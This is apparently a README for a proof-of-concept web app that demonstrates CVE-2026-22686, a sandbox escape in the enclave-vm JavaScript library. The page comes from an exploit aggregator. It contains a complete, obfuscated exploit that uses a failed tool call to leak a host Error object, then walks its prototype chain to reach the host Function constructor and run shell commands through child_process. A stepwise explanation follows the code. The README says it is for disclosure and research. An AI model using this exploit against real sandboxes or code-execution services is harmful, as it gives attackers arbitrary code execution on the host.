Share
## https://sploitus.com/exploit?id=A9D2D6F7-9CFE-56AF-9C8A-1CA767BFEFC3
# CVE-2026-22686 Web Application PoC
**Critical Sandbox Escape Vulnerability Demo**
## Quick Start
```bash
docker-compose up web
```
Then open: **http://localhost:3000**
## The Vulnerability
CVE-2026-22686 allows untrusted code to escape JavaScript sandboxes by exploiting leaked host-realm Error objects.
**Root Cause:** When tool invocations fail, the sandbox exposes host Error objects that retain their prototype chain, allowing attackers to reach the host `Function` constructor and execute arbitrary code.
## Features
- ๐ **Interactive Web UI** - Beautiful interface for testing
- ๐ฅ **Working Exploit** - Vector 35: Host Error Escape technique
- ๐ **Pre-loaded Examples** - Safe code, isolation test, and full exploit
- ๐ฏ **One-Click Demo** - Load and execute exploit instantly
## Usage
1. **Start the web server:**
```bash
docker-compose up web
```
2. **Open in browser:**
```
http://localhost:3000
```
3. **Run the exploit:**
- Click "๐ฃ Load Exploit"
- Click "โถ๏ธ Execute Code"
- Watch the sandbox escape happen!
## The Exploit (Vector 35)
```javascript
// Obfuscated string builder
const s = (...args) => String.fromCharCode(...args);
const kCon = s(99,111,110,115,116,114,117,99,116,111,114);
// Setup prototype accessors
const ObjectProto = Object.prototype;
const lookup = ObjectProto.__lookupGetter__;
const getProtoNative = lookup.call(ObjectProto, '__proto__');
// Trigger non-existent tool to get host Error
try {
await useTool('THIS_TOOL_DOES_NOT_EXIST_XYZ', {});
} catch (hostError) {
// Walk prototype chain
const errProto = getProtoNative.call(hostError);
const ErrorCtor = errProto[kCon];
const HostFunc = ErrorCtor[kCon];
// Execute arbitrary code in host context
const getProcess = HostFunc('return process');
const proc = getProcess();
// Full RCE achieved!
const child_process = proc.mainModule.require('child_process');
child_process.execSync('whoami'); // runs as root
}
```
## Project Structure
```
โโโ web-server.js - Web application (main)
โโโ enclave-vm.js - Vulnerable sandbox library
โโโ docker-compose.yml - Docker orchestration
โโโ Dockerfile.web - Web container
โโโ package.json - Dependencies
โโโ README.md - This file
```
## Browser Cache Fix
If you see JavaScript errors in the console:
**Hard refresh:** `Ctrl+Shift+R` (Windows/Linux) or `Cmd+Shift+R` (Mac)
Or open in **incognito/private mode**.
## API Usage
```bash
curl -X POST http://localhost:3000/execute \
-H 'Content-Type: application/json' \
-d '{"code":"console.log(\"test\");"}'
```
## Security Warning
โ ๏ธ **This application is intentionally vulnerable!**
- DO NOT expose to the internet
- ONLY use in isolated environments
- FOR education and research only
## How It Works
1. **Sandbox Created** - enclave-vm uses Node.js VM module
2. **Tool Fails** - Calling non-existent tool throws Error
3. **Error Leaked** - Host-realm Error exposed to sandbox
4. **Chain Walked** - Prototype chain: Error โ Object โ Function
5. **Function Reached** - Host Function constructor accessed
6. **Code Executed** - `Function('return process')()` runs in host
7. **System Compromised** - Full access to child_process, fs, etc.
## References
- **CVE**: CVE-2026-22686
- **CVSS**: 10.0 (Critical)
- **Technique**: Vector 35 - Host Error Escape
- **Affected**: enclave-vm < 2.7.0
## License
Educational and research purposes only.